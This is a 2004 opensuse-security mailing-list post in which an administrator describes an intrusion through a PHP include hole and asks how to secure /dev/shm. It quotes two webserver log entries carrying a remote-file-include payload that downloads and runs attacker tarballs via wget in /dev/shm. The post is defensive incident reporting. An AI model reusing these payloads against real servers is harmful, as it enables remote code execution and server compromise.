Mailinglist Archive: opensuse-security (145 mails)

< Previous Next >
/dev/shm (in)security / php-based attack
  • From: Olivier Mueller <om-lists-suse-security@xxxxxx>
  • Date: Sat, 06 Nov 2004 00:47:39 +0100
  • Message-id: <1099698459.1712.14.camel@xxxxxxxxxxxxxxxxx>
Hello,

One of the server I'm co-administering just got attacked
a few days ago. The cracker managed to start a shell on
the server by using one of these php-nuke-like include
holes laying in old php scripts. Until now it failed
because most of these scripts were working with /tmp,
and the /tmp on that server was mounted with noexec+nosuid.

But this time /dev/shm was used: is this "new" filesysteme
really necessary, and what for? Would you keep it, or
rather shut it down completely? At least I'd like to
have it also mounted in nosuid/noexec mode... I'll check
in the boot scripts how to do that, but in the mean time
if you have suggestion, you're welcome :)

Webserver logs when the attack occured (the aleks-exploits
pages still seems to be active: you can get some interesting
files from there, like exploits against linux kernel,
irc bots, and other "goodies"):

212.110.91.36 - - [30/Oct/2004:18:03:29 +0200]
"GET /guestbook/include/livre_include.php?no_connect=lol&
chem_absolu=http://www.aleks-exploits.com/own.txt?&cmd=cd%20/dev/shm;
wget%20www.aleks-exploits.com/amech.tgz;tar%20zxvf%20amech.tgz;cd%
20.amech;./sh HTTP/1.1" 200 3189 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows 98)"

212.110.91.36 - - [30/Oct/2004:18:03:49 +0200]
"GET /guestbook/include/livre_include.php?no_connect=lol&
chem_absolu=http://www.aleks-exploits.com/own.txt?&cmd=cd%20/dev/shm;
wget%20www.aleks-exploits.com/a.tgz;tar%20zxvf%20a.tgz;./a HTTP/1.1" 200
2894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"


Regards,
Olivier



< Previous Next >
Follow Ups